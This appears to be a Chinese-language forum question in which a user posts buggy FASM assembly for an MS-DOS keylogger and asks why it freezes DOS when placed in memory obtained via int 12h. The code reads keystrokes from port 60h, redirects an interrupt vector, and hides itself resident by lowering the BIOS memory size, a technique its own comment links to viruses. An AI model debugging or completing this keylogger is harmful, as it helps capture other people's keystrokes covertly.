我在 Fasm 中为 MS-DOS 制作了一个键盘记录器,但是当我运行它时会冻结我的计算机,因为段有问题:我的键盘记录器使用的偏移内存。这是我编码的来源:
cli
push es
mov ax,0
mov es,ax
es
mov bx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
PUSH DS
MOV BP,40H
MOV DS,BP
ds
dec word [13h] ;Memory less by 1K
POP DS
int 12h ;memory into AX
mov cl,6 ;because memory is in K
shl ax,cl
mov bp,ax ;ES is the virus segmentes
es
mov [24h],bx
es
mov [26h],bp
pop es
sti
push es
mov si,bp
mov es,si
mov si,code
mov di,0
mov cx,codesize-code
repz
movsb
pop es
push es
mov si,bp
mov es,si
mov si,keys
mov di,codesize-code+1024
mov cx,36h
repz
movsb
pop es
push es
mov ax,bp
mov es,ax
mov ax,codesize
mov bx,codesize
mov es,bp
es
mov [bx],ax
pop es
ret
code:
pushf
pushaw
sti
IN AL,60H
mov al,20h
out 20h,al
pop es
pop ds
popaw
popf
iret
keys db '',0
codesize:
buf db 1024 dup (0)
iret
如果我使用段:偏移量 2000:0 来存储我的 Int 9 处理程序,则此应用程序可以正常工作,但是如果我使用 int 12h 获取内存段以将键盘记录器置于 MS-DOS 冻结状态。那么我上面的来源有什么问题?